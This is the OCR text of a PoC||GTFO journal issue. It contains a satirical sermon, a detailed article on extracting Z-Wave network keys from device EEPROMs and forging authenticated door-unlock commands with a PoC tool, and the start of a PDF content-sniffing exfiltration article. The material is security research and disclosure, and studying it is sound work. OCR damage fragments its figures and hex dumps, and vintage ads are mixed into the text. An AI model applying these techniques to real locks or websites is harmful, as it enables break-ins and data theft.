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1 Lisez Moi! 


Neighbors, please join me in reading this thir- 
teenth release of the International Journal of Proof 
of Concept or Get the Fuck Out, a friendly little col- 
lection of articles for ladies and gentlemen of distin- 
guished ability and taste in the field of software ex- 
ploitation and the worship of weird machines. This 
release is given on paper to the fine neighbors of 
Montréal. 

If you are missing the first twelve issues, we the 
editors suggest pirating them from the usual loca- 
tions, or on paper from a neighbor who picked up a 
copy of the first in Vegas, the second in São Paulo, 
the third in Hamburg, the fourth in Heidelberg, the 
fifth in Montréal, the sixth in Las Vegas, the seventh 
from his parents” inkjet printer during the Thanks- 
giving holiday, the eighth in Heidelberg, the ninth 
in Montréal, the tenth in Novi Sad or Stockholm, 
the eleventh in Washington, D.C., or the twelfth in 
Heidelberg. 

We begin on page 4 with a sermon concerning 
peak computation, population bombs, and the joy 
of peeks and pokes in the modern world by our own 
Pastor Manul Laphroaig. 

On page 6 we have a Z- Wave Christmas Carol by 
Chris Badenhop and Ben Ramsey. They present a 
number of tricks for extracting pre-shared keys from 
wireless Z-Wave devices, and then show how to use 
those keys to join the network. 

On page 14, Krzysztof Kotowicz and Gábor 
Molnár present Comma Chameleon, weaponize PDF 
polyglots to exfiltrate data via XSS-like vulnerabil- 
ities. You will never look at a PDF with the same 
eyes again, neighbors! 

Chris Domas, whom you'll remember from his 
brilliant compiler tricks, has contributed two arti- 
cles to this fine release. On page 28, he explains 
how to implement M/o/Vfuscator as a Virtual Ma- 
chine, producing a few bytes of portable C or as- 
sembly and a complete, obfuscated program in the 
.data segment. 

IBM had JCL with syntax worse than Joss, and 
everywhere the language went, it was a total loss! So 
dust off your z/OS mainframe and find that ASCI- 
I/EBCDIC chart to read Soldier of Fortran's JCL 
Adventure with Network Job Entries on page 32. 

What does a cult Brezhnev-era movie have to do 
with how exploit code finds its bearings in a Win- 
dows process’ address space? Read Exploiting Weak 
Shellcode Hashes to Thwart Module Discovery; or, 
Go Home, Malware, You’re Drunk! by Mike Myers 


and Evan Sultanik on page 57 to find out! 

Page 63 begins Alex Ionescu’s article on a De- 
viceGuard Mitigation Bypass for Windows 10, esca- 
lating from Ring 3 to Ring 0 with complete recon- 
struction of all corrupted data structures. 

Page 72 is Chris Domas’ second article of this 
release. He presents a Turing-complete Virtual Ma- 
chine for VIM using only the normal commands, 
such as yank, put, delete, and search. 

On page 76 you will find a rousing guest ser- 
mon Doing Right by Neighbor O’Hara by Andreas 
Bogk, against the heresy of “sanitizing” input as a 
miracle cure against injection attacks. Our guest 
preacher exposes it as fundamentally unneighborly, 
and vouchsafes the true faith. 

Concluding this issue’s amazing lineup is Are an- 
droids polyglots? by Philippe Teuwen on page 79, in 
which you get to practice Jedi polyglot mind tricks 
on the Android package system. Now these are the 
droids we are looking for, neighbors! 





On page 80, the last page, we pass around the 
collection plate. We’re not interested in your dimes, 
but we’d love some nifty proofs of concept. And re- 
member, one hacker’s “junk hacking” may hold the 
nifty tricks needed for another’s treasured exploit! 
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2 Surviving the Computation Bomb 


by Manul Laphroaig 


Gather round the campfire, neighbors. Now is the time for a scary story, of the kind that only science can 
tell. Vampires may scare children, but it takes an astronomer to scare adults—as anyone who lived through 
the 1910 scare of the Earth's passing through the Halley's comet's tail would plainly tell you. After all, they 
had it on the best authority! that the tail's cyanogen gas—spectroscopically confirmed by very prominent 


bands—would impregnate the atmosphere and possibly snuff out all life on the planet. 


But comets as a scare are old and busted, and astronomic spectroscopy is no longer a hot new thing, 


prominent bands or no. We can do better. 


Imagine that you come home after a strenuous workday, and, after 
a nice dinner, sit down to write some code on that fun little project 
for your PoC||GTFO submission. Little do you know that you are 
contributing to the thing that will doom us all! 

You see, neighbors, there is only so much computation possible in 
the world. By programming for pleasure, you are taking away from 
this non-renewable resource—and, when it runs out, our civilization 
will be destroyed. 


Think of it, neighbors. Computation was invented by mathemati- 
cians, and they tend to imagine infinite resources, like endless tapes 
for their model machines, but in reality nothing is inexhaustible. 
'There is only a finite amount of atoms in the universe—so how could 
such a universe hold even one of these infinite tapes? Mathemati- 
cians are notorious for being short-sighted, neighbors. 

You may think, okay, so there may not be an infinite amount 
of computation, but there's surely enough for everyone? No, neigh- 
bors, not when it's growing exponentially! We may have been safe 
when people just wrote programs, but when they started writing pro- 
grams to write programs, and programs to write programs to write 
programs, how long do you think this unsustainable rush would last? 
Have you looked at the size of a “hello world" executable lately? We 
are doomed, neighbors, and your little program is adding to that, 
too! 


COMET'S POISONOUS TAIL. 


Yerkes Observatory Finds Cyanogen in 
Spectrum of Halley's Comet. 


Special to The New York Times. 

BOSTON, Mass. Feb. 7.—Astronomers 
at the Harvard Observatory have not yet 
made a photographic spectrum of Hal- 
ley's comet, which is rapidly approaching 
the earth, but a telegram received there 
to-day from the Yerkes Observatory 
states that spectra of the comet obtained 
by the Director and his assistants show 
very prominent cyanogen bands. 

Cyanogen is a very deadly poison, a 
grain of its potassium salt touched to the 
tongue being sufficient to cause Instant 
death. In the uncombined state it is a 
bluish gas very similar in its chemical be- 
havior to chlorine and extremely poison- 
cus. It is characterized by an odor sim- 
ilar to that of almonds. The fact that 
cyanogen is present in the comet has 
been communicated to Camille Flamma- 
rion and many other astronomers, and is 
causing much discussion as to the prob- 
able eifect on the earth should it pass 
through the comet's tall. Prof. Flamma- 
rion is of the opinion that the cyanogen 
gas would impregnate the atmosphere 


and possibly snuff out all life on the 
planet. 
Only once, as far as known, has the 


Now you may think, what about all these shiny new computers they keep making, and all those bright ads 


showing how computers make things better, with all the happy people smiling at you? But these are made 
by corporations, neighbors, and corporation would do anything to turn a profit, would they not? Aren't 
they the ones destroying the world anyway?? Perhaps the rich and powerful will have stashed some of it 
away for their own needs, but there will not be enough for everyone. 


Think of the day when computation runs out. The Internet of Things will turn into an Internet of Bricks, 
and all the things it will be running by that time, like your electricity, your water, your heat, and so on will 
just stop functioning. The self-driving cars will stop. In vain will your smart fridge, previously shunned by 
your other devices as the simpleton with the least processor power, call out to its brethren and its mother 
factory—until it too stops and gives up its frosty ghost. 





l'The New York Times. Your best source for the science of how the world would end most horribly and assuredly real soon 
now. 
2Searching the New York Times for this one is left as an exercise to the reader. 


A national mobilization of the senior folks who still remember how 
to use paper and drive may save some lives, but “will only provide a 
stay of execution.” Nothing could be more misleading to our children 
than our present society of affluent computation!? 

To meet the needs of not just individual programmers, but of society 
as a whole, requires that we take an immediate action at home and 
promote effective action worldwide—hopefully, through change in our 
value system, but by compulsion if voluntary methods fail—before our 
planet is permanently ruined.* 

No point in beating around the bush, neighbors—computation must 
be rationed before it's too late. We must also control the population of 
programmers, or mankind will program itself into oblivion. “The hand 
that hefted the axe against the ice, the tiger, and the bear [and] now 
fondles the machine gun"—and, we must add, the keyboard— "just as xaxa ask iman Seay, Ji teenies olla 
lovingly"? suppose em us 





must be stopped. 
Uncontrolled programming is a menace. The peeks and pokes can- 
not be left to the unguided masses. Governments must step in and Do Something. 


Well, maybe the forward-thinking elements in government already are. When industrial nations sign 
an international agreement to control software under the same treaty that controls nuclear and chemical 
weapon technologies—and then have to explicitly exclude debuggers from it, because the treaty's definition 
of controlled software clearly covers debuggers—something must be going on. When politicians who loudly 
profess their commitment to technological progress and education demand to punish makers and sellers of 
non-faulty computers—maybe they are only faking ignorance. 

When the only “Advanced Placement" computing in high schools means Java and only Java, one starts 
to suspect shenanigans. When most of you, neighbors, barely escaped courses that purported to teach pro- 
gramming, but in fact looked like their whole point was to turn you away from it—can this be a coincidence? 
Not hardly, neighbors, not by a long shot! 

Scared yet, neighbors?9 


Garlic against vampires, silver against werewolves, the Elder Sign against sundry star-spawn. The scary 
story teaches us that there's always a hack. So what is ours against those who would take away our PEEK 
and our POKE in the name of expert opinions on the whole society's good? 

Perhaps it is this little litany: "Science is the belief in the ignorance of experts." At the time that Rev. 
Feynman composed it, he felt compelled to say, “I think we live in an unscientific age ... [with] a considerable 
amount of intellectual tyranny in the name of science." We wonder what he would have said of our times. 


But take heart, neighbors. Experts and sciences of doom come and go; so do killer comets with cyanogen 
tails," the imminent Fifth Ice Age, and population bombs. We might survive the computation bomb yet—so 
finish that little project of yours without guilt, send it to us, and let its little light shine—in an unscientific 
world that needs it. 





3Cf. Paul Erhlich, “The Population Bomb," 1968, p. xi, which begins with “The battle to feed all of humanity is over. In 
the 1970s hundreds of millions of people will starve to death in spite of any crash programs embarked upon now. At this late 
date nothing can prevent a substantial increase in the world death rate..." The 1975 edition amended “the 1970s" to “the 1970s 
and 1980s,” but—as the newer and more fashionable kinds of school math teach us—never mind the numbers, the idea is the 
important thing! 

^Oops, that one was a quote, too. No wonder that story was a best-seller! 

5Ibid., p. xiii 

SIf you think that the “non-renewable computation" argument makes no sense, you are absolutely right! But, do the 
arguments for “golden keys" in cryptography or for "regulating exploits" make any more sense? No, and they sound just as 
scientific to those inclined to believe that actual experts have, in fact, been consulted. And sometimes they even have been, for 
a certain definition of experts. 

"But I bet CyanogenMod is in your Android. Coincidence? 


3 Carols of the Z-Wave Security Layer; or, 
Robbing Keys from Peter to Unlock Paul 


) Ex(Nwk Key) + 


CBC-MAC, 


aci 


3.1 Adeste Fideles 


Z-Wave is a physical, network, and application layer 
protocol for home automation. It also allows mem- 
bers of the disposable income class to feed their zeal 
for domestic gadgetry, irrespective of genuine utility. 
Z-Wave devices sit in their homes, quietly exchang- 
ing sensor reports and actuating in response to user 
commands or the environment. 

The curious reader may use an SDR to learn 
how, when, and what they communicate. Tools 
like Scapy-radio (Picod, Lebrun, and Demay) and 
EZ-Wave (Hall and Ramsey) demodulate Z-Wave 
frames for inspection and analysis. The C++ source 
code for OpenZwave is a great place to examine 
characteristics of the Z-Wave application layer. Oth- 
ers may still prefer to cross-compile OpenZwave to 
their favorite target and examine the binary using a 
custom disassembler built from ROP gadgets found 
in the old shareware binary WOLF3D.EXE. 

After tinkering with Z-Wave devices and an 
SDR, the stimulated readers will quickly realize that 
they can send arbitrary application layer commands 
to devices where they are executed. To combat this, 
some devices utilize the Z-Wave security layer, which 
provides both integrity and confidentiality services 
to prevent forgery, eavesdropping, and replay. 

The first gospel of the Z-Wave security layer 
was presented by Fouladi and Ghanoun at Black 
Hat 2013. In it they identified and exploited a re- 
mote rekeying vulnerability. In this second gospel 
of the Z-Wave security layer, we validate and ex- 
tend their analysis of the security layer, identify a 
hardware key extraction vulnerability, and provide 
open source PoC tools to inject authenticated and 
encrypted commands to sleeping Z-Wave devices. 


by Chris Badenhop and Ben Ramsey 


sensor 


Ej (DATA)+ 
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3.2 Deck the Home with Boughs of 
Z-Wave 


This Christmas, Billy Peltzer invests heavily in Z- 
Wave home automation. The view of his festive 
front porch reveals several of these gadgets. Billy 
is a little paranoid after having to defend himself 
from hordes of gremlins every Christmas, so he in- 
stalls a Z-Wave door lock, which both Gizmo and 
he are able to open using a smart phone or tablet. 
Billy uses a Z-Wave smart plug to control Christmas 
lights around his front window. He programs the 
strand of lights to turn on when a Z-Wave PIR (pas- 
sive infrared) sensor detects darkness and turn off 
again at daylight. This provides a modest amount 
of energy savings, which will pay for itself and his 
Mogwai-themed ornament investment after approx- 
imately 20 years. 


The inquisitive reader may wonder if Billy’s front 
door is secure. Could a gremlin covertly enter his 
home using the Z-Wave application layer proto- 
col, or must it instead cannonball through a win- 
dow, alerting his dog Barney? Fortunately, sniff- 
ing, replaying, or injecting wireless door commands 
is fruitless because the door command class imple- 
ments the Z-Wave security layer, which is rooted in 
cryptography. 

Z-Wave cryptography uses symmetric keys to 
provide encryption and authentication services to 
the application layer. It stores a form of these keys 
in nonvolatile memory, so that the device does not 
require rekeying upon power loss. Of the five locks 
we have examined, the nonvolatile memory is al- 
ways located in the inner-facing module, so a grem- 
lin would have to destroy a large portion of the Z- 


Wave door lock to extract the key. At that point it 
would have physical access to the lock spindle any- 
way, making the cryptographic system moot. 
Wireless security is enabled on the 5th gener- 
ation (ie., Z-Wave Plus) devices on Billy's front 
porch. Thus, their memory contains the same keys 
that keep gremlins from wirelessly unlocking his 
door. À gremlin may crack open the outdoor smart 
plug or PIR sensor, locate and extract the keys, and 
send an authenticated unlock command to the door. 
Billy has figuratively left a key under the doormat! 


3.3 We Three Keys of AES Are 


Since Z-Wave security hinges on the security of the 
keys, it is important to know how they are stored 
and used. Z-Wave encryption and authentication 
services are provided by three 128-bit AES keys; 
however, the security of an entire Z- Wave network 
converges to a single key in the set. Like the three 
wise men, only one of them was necessary to deliver 
the gifts to Brian of Nazareth. The other two could 
have just as well stayed home and added a few ex- 
tra camels to haul the gifts. A card would also have 
been nice. 

'The key of keys in this system is the network 
key. This key is generated by the Z-Wave network 
controller device and is shared with every device re- 
quiring cryptographic services. It is used to derive 
both the encrypting and signing keys. When a new 
device is added to a Z-Wave network, the device may 
declare a set of command classes that will be using 
security (e.g., the door lock command class) to the 
Z-Wave network controller. In turn, the controller 
sends the network key to the new device. To provide 
a razor-thin margin of opaqueness, this message is 
encrypted and signed using a set of three default 
keys known by all Z-Wave devices. The default en- 
cryption and authentication keys are derived from a 
default 128-bit network key of all zeros. If the ad- 
herent reader recovers the encryption key from their 
device, decrypts sniffed frames, and finds that the 
plaintext is not correct, then they should attempt 
to use the encryption key derived from the null net- 
work key instead.? 

An authentication key is derived from a network 
key as follows. Using an AES cipher in ECB-mode, 
a 16-byte authentication seed is encrypted using the 
network key to derive the authentication key. The 
derivation process for the encryption key is identical, 





Sunzip pocorgtfo12.pdf zwave.tar.bz2 


except that a different 16-byte seed value is used. A 
curious reader may want to know what these seeds 
are, and any fortuitous reader in possession of a Mi- 
CasaVerde controller will be able to tell you. 

The MiCasaVerde controller uses an embedded 
Linux OS and provides two mechanisms for ex- 
tracting a keyfile from its filesystem, located at 
/etc/cmh/keys. Using the web interface, one may 
download a compressed archive of the controller 
state. The archive contains the /etc directory of 
the filesystem. Alternatively, a secure shell inter- 
face is also provided to remotely explore the filesys- 
tem. The MiCasaVerde binary key file (keys) is 
exactly 48 bytes and contains all three keys. The 
file is ordered with the network key first, the au- 
thentication key second, and the encryption key 
last. Billy Peltzer's Z-Wave network controller is a 
MiCasaVerde-Edge. In Figure 1, we show the result- 
ing key file and dump the values of the keys for his 
network (i.e., 0xe97a5631cb5686fa24450eba103f - 
945c). 

To find the seeds, one must simply decrypt the 
authentication and encryption keys using an AES ci- 
pher in ECB mode loaded with the network key, and 
the resulting gifts will be the authentication and en- 
cryption seeds respectively. From our own observa- 
tions, the same seed values are recovered from both 
3rd and 5th generation Z-Wave devices. Billy's keys 
are used in Figure 2 to recover the seeds. Given the 
seed values and a network key, we have a method for 
deriving the encryption key and the authentication 
key from an extracted network key. 


3.4 Away in an EEPROM, No ROM 
for Three Keys 


Z-Wave devices other than MiCasaVerde controllers 
may not have an embedded Linux OS, so where are 
the keys stored in these devices? Extracting and an- 
alyzing the nonvolatile memory of Billy's PIR sensor 
and doorlock reveal that the network key is stored in 
a lowly, unprotected 8-pin SPI EEPROM, which is 
external to the proprietary Z-Wave transceiver chip. 
In fact, only the network key is stored in the EEP- 
ROM, implying that the encryption key and the au- 
thentication key are derived upon startup and stored 
in RAM. 

Unless the device designers hoped to obscure the 
key derivation process, the decision to store only 
the network key in nonvolatile memory is unclear. 
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Moreover, it is not clear why the key is found in the 
EEPROM rather than somewhere in the recesses of 
the proprietary ZWOX01 Z-Wave transceiver mod- 
ule, whose implementation details are protected by 
an NDA. The transceiver certainly has available 
flash memory, and there does not appear to be any- 
one who has dumped the ZW0501 5th generation 
flash memory yet. Until this issue is fixed, anyone 
with an EEPROM programmer and physical access 
can acquire this key, derive the other two keys, and 
issue authenticated commands to devices. We ex- 
tract Billy's network key by desoldering the EEP- 
ROM from the main board of his PIR sensor and use 
an inexpensive USB EEPROM programmer (Sign- 
stek MiniPRO) to dump the memory to a file. 

'The circuit board from the PIR sensor is shown 
in Figure 3. The ZW0501 transceiver is the large 
chip located on the right side of the board (a 3rd 
generation system would have a ZW0301). In gen- 
eral, the SPI EEPROM is the 8-pin package clos- 
est to the transceiver. The reader may validate 


that the SPI pins are shared between the EEP- 
ROM and transceiver package to be sure. In fact, 
the ATMLH436 EEPROM used in a 3rd generation 
door lock is not in the MiniPRO schematics library, 
so we trace the SPI pin outs of the ZM3102 (i.e., 
the postage-stamp transceiver package) to the SPI 
EEPROM to identify its pin layout. We use this 
information to select a compatible SOIC8 ATMEL 
memory chip that is available in the MiniPRO li- 
brary. 


We are unable to provide a fixed memory address 
of the network key, as it varies among device types. 
Even so, because the memory is so empty (79996 
zeros), the key is always easy to find. In all three 
of Billy's Z-Wave devices, the key is within the only 
string of at least 16 bytes in memory. The region 
of the EEPROM memory of Billy's PIR sensor con- 
taining the same network key follows, with the key 
itself starting at address 0x60A0. 





~/Downloads/etc/cmh $ Is 





alerts. json HW Key user data.json.lzo.1 
cmh. conf HW Key2 user data.json.lzo.2 
devices keys user data.json.lzo.3 
dongle.3.83.dump.0 last report user data.json.lzo.4 
dongle.3.83.dump.1 PK_ AccessPoint user_data.json.lzo.5 
dongle.3.83.dump.2 servers.conf. default vera model 
dongle.3.83.dump.3 sync kit wan failover 
dongle.3.83.dump.4 sync rediscover zwave locale 

ergy key user data.json.luup.lzo 

first boot user data.json.lzo 

“/ Downloads /etc/cmh $ xxd ./keys 

0000000: e97a 5631 cb56 86fa 2445 Oeba 103f 945c .zV1.V..$E...?.\ 
0000010: 620d 486c 6a65 2122 afel 086c 79e6 3740 b.Hlje!"...ly.70 
0000020: eec9 ef96 al55 a3d3 02al 8441 f5f3 7ea0  ..... Use are 





Figure 1 — Keys found in Billy's MiCasaVerde Edge Controller 








~/POCs $ 


./getSeeds ../keys/veraedge keyFile 


gcry cipher open worked 
gcry cipher setkey worked 
gcry cipher decrypt worked 


A K: 
A Seed: 


62 0d 48 6c 6a 65 21 


22 
55 


af el 8 6c 79 
55 55 55 55 55 55 


gcry cipher decrypt worked 


EK: 
E Seed: 


ee c9 ef 96 al 55 a3 


d3 
aa 


2 al 84 41 f5 
aa aa aa aa aa aa 


e6 37 40 


f3 7e a0 


55 55 55 55 55 55 55 55 55 


aa aa aa aa aa aa aa aa aa 





Figure 2 — The seeds for the Encryption and Authentication Keys 











Figure 3 — Location of the EEPROM DIP on a 5th gen Z-Wave PIR sensor (Aeotec Multisensor 4) 








6090: 00000000 00000000 00000000 ff000001 
60a0: e97a5631 cb5686fa 24450eba 103f945c 
60b0: 56001498 eff17275 13cc4201 00000000 
60c0: 42326402 a8010000 00000000 00000000 








For reference, the segment of memory in Billy’s 
door lock containing the network key follows. The 
network key starts at address 0x012D. 








0110: 00000000 00000000 00000000 00000000 
0120: 00000000 00420100 00000000 81e97a56 
0130: 31cb5686 fa24450e bal03f94 5c560000 
0140: 00000000 00000000 00000000 00000000 








To summarize the above, each device contains a 
network key, an authentication key, and an encryp- 
tion key. The network key is common throughout 
the network and is shared with the devices by us- 
ing default authentication and encryption keys that 
are the same for all 3rd and 5th generation Z-Wave 
devices in the world. The authentication and the 
encryption key on the device are derived from the 
network key and the nonces of all 5s and all As re- 
spectively. 


3.5 Do You Hear What I Hear? A 
Frame, a Frame, Encapsulated in 
a Frame, Is Encrypted 


Even armed with the keys, the patient reader still 
needs to know how to use them. The Z-Wave se- 
curity service provides immutable encryption and 
authentication through the use of an encapsulation 
frame. The encapsulation security frame (shown be- 
low) is identified in the first two bytes of the applica- 
tion layer payload. The first byte specifies the com- 
mand class, and the second provides the command, 
where an encapsulated security frame has byte val- 
ues of 0x98 and 0x81, respectively. The remainder 
of the frame contains the eight upper bytes of the 
IV, used for both encryption and signing, the vari- 
able length encapsulated and encrypted payload, the 
nonce ID, and an 8-byte CMAC (cipher-based mes- 
sage authentication code). 


Encapsulated / Encrypted 
Frame 


Ss 


Cmd 
class 








¡Nonce] 
ID 


0x98 | 0x81 | Upper 1V[8] ne Cmd CMACIS] 






































At a minimum, the frame encapsulated in the 
security frame is three bytes. The first byte is used 
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for fragmentation; however, we have yet to observe 
a value other than 0x00 in this field. The second 
byte provides the command class and, like the ap- 
plication layer, is followed by a single command byte 
and zero or more bytes of arguments. 


The application payload is encrypted using the 
encryption key and an AES cipher in OFB mode 
with a 16-byte block size. OFB mode requires a 16- 
byte IV, which is established cooperatively between 
the source and destination. The lower 8 bytes of 
the IV are generated on request by the destination, 
which OpenZwave calls a nonce, and are reported 
to the requestor before the encapsulation frame is 
sent. The first byte of this 8-byte nonce is what we 
referred to as the nonce ID. The upper eight bytes 
of the IV are generated by the sender and included 
in the encapsulation security frame. When the des- 
tination receives the encapsulated frame, it decrypts 
the frame using the same cipher setting and key. It 
is able to reconstruct the IV using the IV field of the 
encapsulated frame and by using the nonce ID field 
to search its cache of generated nonces. 





3.6 Joy to the Home, 
Traffic is Revealed 


Encrypted 


Some cautious readers may become anxious when 
two automations are having a private conversation 
within their dwelling. This is especially true when 
one of them is a sensor, and the other is connected 
to the Internet. Fear not! Armed with knowledge 
of the encapsulation security frame and possession 
of the network or encryption key, the triumphant 
reader can readily decrypt frames formerly hidden 
from them. They will hopefully discover, as we have, 
that Z-Wave messages are devoid of sensitive user 
information. However, may the vigilant reader be 
a sentry to warn us if any future transgressions do 
occur in the name of commercialism and Orwellian- 
ism. 


From Bridge 
to Ferris 


With a a set of 
wonderful, 


fascinatin g To aid the holy sentry, we provide the PoC 
decryptPCAPNG tool to decrypt Z-Wave encapsu- 
lated Z-Wave frames. The user provides the network 
or encryption key. The tool assumes the user is cap- 
turing Z-Wave frames using either Scapy-radio or 
EZ-Wave with an SDR, which sends observed frames 


make-believe to Wireshark for capture and saving to PCAPNG 


river, then later files. 

use the same steel 

girders and 

o A 3.7 What Frame Is This, Who Laid 


Wheel. 
The wheel will | 
turn and the | 
bridge can be | 
raised for 
steamers. 

These are but two 
of the working mo- 

| delsillustrated and 


described in our 
catalog. 


Write for illustrated catalog 
and list of dealers. 


to Rest, upon Receiver's An- 
tenna, Did Originate? 


Secure Z-Wave devices do not act upon a command 
issued in an encapsulation frame unless its CMAC 
is validated. Thus, the active reader wishing to do 
more than observe encrypted messages requires fur- 
ther discourse. Certainly, the gremlin wishing to 
open Billy's front door desires the ability to gener- 
ate an authenticated unlock-door command. 

The Z-Wave CMAC is derived using the CBC- 
MAC algorithm, which encrypts a message using an 
AES cipher in CBC mode using a block size of 16 


0/0/9080 D 000/00 090 5 6 5 00 9700192131915 5 5:9 


EET Go 0 © 6 Ono 6 6 Ono Ono” 


You can build many others with 
Meccano, made mostly of brass 
and polishedsteel. Asksome good 
toy or sporting goods store to 
show you Meccano. Be sure to 
get Meccano. Look for the name 
on boxes and literature. 


The Embossing Co. 
23 Church St. Albany, N. Y. 


Manufacturers of 


“Toys that Teach’’ 
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bytes. It uses the same IV as the encryption cipher, 
and only the first eight bytes of the resulting 16- 
byte digest are sent in the encapsulation frame to be 
used for authentication. Instead of creating the di- 
gest from the entire security encapsulation frame, a 
subset of fields are composed into a variable-length 
message. The first four bytes of this message are 
always the security command class ID, source ID, 
destination ID, and length of the message. The re- 
maining portion of the message is the variable length 


encapsulated frame (e.g., an unlock-door command, 
including the fragmentation byte) after it has been 


encrypted. 
Encapsulated / Encrypted 
Frame 


AS 





a 


Frag. 
Field 


^ 





Dst 
ID 


Msg 
len 


Cmd 
class 


Src 


0x98 ID 


Cmd 























The recipient of the encapsulation security frame 
validates the integrity of the frame using the in- 
cluded 8-byte CMAC. It is able to generate its own 
CMAC by reconstructing the message to generate 
the digest using the available fields in the frame, 
the IV, and the authentication key. If the generated 
CMAC matches the declared value in the frame, 
then the source ID, destination ID, length, and con- 
tent of the encapsulated frame are validated. Note 
that, since the other fields in the frame are not part 
of the CMAC message, they are not validated. If 
the generated digest does not match the CMAC in 
the frame, the frame is silently discarded. 
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3.8 Bring a Heavy Flamer of Sanc- 
tified Promethium, Jeanette, Is- 
abella 


Knock! Knock! Knock! Open the door for us! 
Knock! Knock! Knock! Let's celebrate! 

We wrote OpenBarley as a PoC tool to demon- 
strate how Z-Wave security works. Its default en- 
capsulated command is to unlock a door lock, but 
the user may specify alternative, arbitrary com- 
mands. The tool works with the GNURadio Z-Wave 
transceiver available in Scapy-radio or EZ-Wave to 
inject authenticated and encrypted frames. 

'The reader must note that battery operated Z- 
Wave devices conserve power by minimizing the 
time the transceiver is active. When in low-power 
mode, a beam frame is required to bring the re- 
mote device into a state where it may receive the 
application layer frame and transmit an acknowledg- 
ment. Scapy-radio and EZ-Wave did not previously 
support waking devices with beam frames, so we 
have contributed the respective GNURadio Z-Wave 
blocks to EZ-Wave to allow this. 


3.9 It Came! Somehow or Other, It 
Came Just the Same! 


'This Christmas, as we have done, may you, the 
blessed reader, extract the network key from the 
EEPROM of a Z-Wave device. May you use our 
PoCs to send authenticated commands to any other 
secured device on your network. May you enlighten 
your friends and neighbors, affording them the op- 
portunity to sanctify by fire, or with lesser, more 
legal means, home automation lacking physical se- 
curity in the name of Manion Butler and his holy 
mother. May you use our PoCs to watch the au- 
tomation for privacy breaches and data mining in 
the time to come, and may you brew in peace. 






PODUNK HOLLow 
- HAMFEST `. 


RADIO CONTROL 
DEMON STRATION 






“Submarine, heck! It's supposed to be an airplane!" 


Trade-ins are not always what they seem, either. That's why it will pay you, 
as it has thousands of others, to rely on the one and only "Surprise" trade-in 
policy popularized by Walter Ashe. For real satisfaction and money saving, 
trade used (factory-built) test or communication equipment today. Wire, 
write, phone or use the handy coupon. 


ECCO 10 METER TRANS-RECEIVER 
Designed for spot frequency use for emergency, CD, 
and net operation. Completely self-contained includ- 
ing batteries. Transmitter uses 20 meter crystals. 
Fixed frequency receiver has regenerative circuit. 
Base loaded 36" antenna. Carbon mike input. Y 
watt input to final. With 5 tubes. Less mike, head- 
phones, crystal, and batteries. 

MODEL HT-2. Net $74.50. 
Z-3 Crystal (specify frequency). Net $3.87. 
Batteries (2-M30 “B”, 1-2F "A"). Net $4.76. 





ELMAC MOBILE RECEIVER. 


GONSET "'Super 
Dual conversion, 10 tubes, less 


6” Converter. 





power supply. Model 3030-6. 
Model PMR-6A. For 6 volts. For 6 VDC. 
Net $134.50. Net $52.50. 

Model PMR-12A. For 12 volts. Model 3030-12. 
Net $134.50 For 12 VDC. 
Net $52.50. 





CARTER GENEMOTORS. “2” power for mobile transmitters. 





























Model Input VDC Output VDC Net 
ELMAC AF-67 450AS 6 @ 29 A. 400 @ 250 MA $50.70 
TRANS-CITER. 520AS 6 @ 28 A. 500 @ 200 MA 51.46 
Net $177.00 624VS 6 @ 46 A. 600 @ 240 MA 52.32 
e "7 450BS 12 @ 13 YA. 400 @ 250 MA 51.46 
520BS 12 @ 14 A. 500 @ 200 MA 52.19 
ip 7 -FREE CATALOG! Send for your copy today ===. 
E WALTER ASHE RADIO COMPANY Q-7-55 | 
1 1125 Pine Street, St. Lovis 1, Missouri LI 
I Rush “Surprise” Trade-In offer on my. 1 

I P 

1 for : 
[| (show make and model number of new equipment desired) I 
; D Rush copy of lastest Catalog. : 
H Name A 
RADIO CO. - Address - 
! ci 1 
1125 PINE ST. e ST. LOUIS 1, MO. 1 0 —— — —Ó À 259 : 
o BS BSE SSB ES SS Se ee 





Ha 
[9v 


4 Content Sniffing with Comma Chameleon 


The nineties. The age of Prince of Bel Air, leg- 
gings and boot sector viruses. Boy George left Cul- 
ture Beat to start a solo career, NCSA Mosaic was 
created, and SQL injection became a thing. Every- 
one in the industry was busy blowing the dot-com 
bubble with this whole new e-commerce movement 
— and then the first browser war started. Browsers 
rendered broken HTML pages like crazy to be con- 
sidered “better” in the eyes of the users. Web servers 
didn't care enough to specify the MIME types of 
resources, and user agents decided that the best 
way to keep up with this mess is to start sniffing. 
MIME type sniffing,? that is. In short, they relied 
on heuristics to recognize the file type of the down- 
loaded resource, often ignoring what the server said. 
If it quacks like an HTML, it must be HTML, you 
silly Apache. Such were the 90s. 





by Krzysztof Kotowicz and Gábor Molnár 


'This MIME type sniffing or content sniffing has 
obviously led to a new class of web security problems 
closely related to polyglots: if one partially controls 
the server response in, e.g., an API call response or 
a returned document and convinces the browser to 
treat this response as HTML, then it's straightfor- 
ward XSS. The attacker would be able to imperson- 
ate the user in the context of the given domain: if 
it is hosting a web application, an exploit would be 
able to read user data and perform arbitrary actions 
in the name of the user in the given web application. 
In other cases, user content might be interpreted 
as other (non-HTML) types, and then, instead of 
XSS, content-sniffing vulnerabilities would be per- 
mitted for the exfiltration of cross-domain data— 
just as bad. 


9MSDN, MIME Type Detection in Windows Internet Explorer 


Browser displaying evil.com 


«object 
type-"application/pdf" 
data="victim.com/api" 

















inside the browser 


vulnerable API URL 


bootstrap code 


target URL 


exfiltrated data 













PDF reader 






victim.com 


HTTP GET 
vulnerable API URL 


response with 
embedded PDF 















HTTP GET 


target URL 
with cookies 










response 









Here we focus on PDF-based content-sniffing at- 
tacks. Our goal is to construct a payload that turns 
a harmless content injection into passive file formats 
(e.g., JSON or CSV) into an XSS-equivalent con- 
tent sniffing vulnerability. But first, we'll give an 
overview of the field and describe previous research 
on content sniffing. 


4.1 Content Sniffing of Non-plugin 
File Types 


To exploit a content sniffing vulnerability, the at- 
tacker injects the payload into one of the HTTP 
responses from the vulnerable origin. In practice, 
that origin must serve partially user-controlled con- 
tent. This is common for online file hosting appli- 
cations (the attacker would then upload a malicious 
file) or in APIs like JSONP that reflect the payload 
from the URL (attacker then prepares the URL that 
would reflect the content in the response). 

'The first generation of content sniffing exploits 
tried to convince the browser that a given piece of 
non-HTML content was in fact HTML, causing a 
simple XSS. 

In other cases, content sniffing can lead to cross- 
origin information leakage. A good example of this 
is mentioned in Chris Evans’ research!? and a re- 
cent variation on it from Filedescriptor,!! which are 
based on the fact that browsers can be tricked into 
interpreting a cross-origin HTML resource as CSS, 
and then observe the effects of applying that CSS 
stylesheet to the attacker's HTML document, in or- 
der to derive information about the HTML content. 

Current browsers implement more secure 
content-type detection algorithms or deploy other 
